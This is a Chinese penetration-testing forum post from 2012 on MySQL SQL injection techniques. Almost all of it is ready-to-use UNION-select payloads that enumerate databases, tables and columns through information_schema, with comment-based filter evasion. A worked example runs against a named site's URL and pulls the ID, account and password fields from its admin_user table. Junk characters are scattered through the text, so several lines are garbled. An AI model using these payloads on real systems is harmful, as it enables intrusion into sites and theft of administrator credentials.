中国网络渗透测试联盟

标题: mysql注入技巧 [打印本页]

作者: admin    时间: 2012-9-13 16:29
标题: mysql注入技巧
查库$ y" a, q2 E: q: M
6 P1 |7 c( f* j7 E( F
id=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*) O: B" L* E- ]6 U7 s& {
) w# R3 V! Z6 s, @: I
查表
# ~' W) V) F% {. \1 H  U! T
; M% }0 D/ Q/ a3 _: H4 M( t& ]+ rid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
2 z2 |) R% P0 y: ?, i% F. ?
2 p, l, [9 W6 J8 L查段# ]& J1 o: F) ~/ _: L7 l, w
, G% q# X& @; \' b* R9 G0 ?/ o
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1( q% R- Y7 I9 M! v; S" l' f
/ g% u% c1 t& A; v# p

4 B5 i9 [8 B! e; Q& ^+ fmysql5高级注入方法暴表
- h/ q$ A( Q# @: Z7 M0 r, q4 x6 O& {7 t0 N- p. `! N
例子如下:! ]- `' [" C* t1 m! s

8 _2 S) B* T( t' a3 B8 r8 p0 D8 m# S! _1.爆表" p: r: `3 i- F3 R& v
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)- L# J3 Z1 X$ q3 G4 Y; p
这样爆到第4个时出现了admin_user表。
4 ^5 G( _" w8 x$ N8 a: u6 o7 M; E7 l3 ~/ f4 |: B  ?4 Y
2.暴字段9 {8 U/ p+ m9 i; Z7 V
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
5 q+ `  J5 V4 T0 Q+ u7 R5 J, F5 X# u8 A; O% @

* N/ u6 ~8 r: Y* @/ Y3.爆密码( T6 Y$ p6 t6 Q' D/ p/ A! b! o
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
% W: F; t; }" w; r  G, N$ d1 c1 g9 _
. o# N9 \# v. ~4 \





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2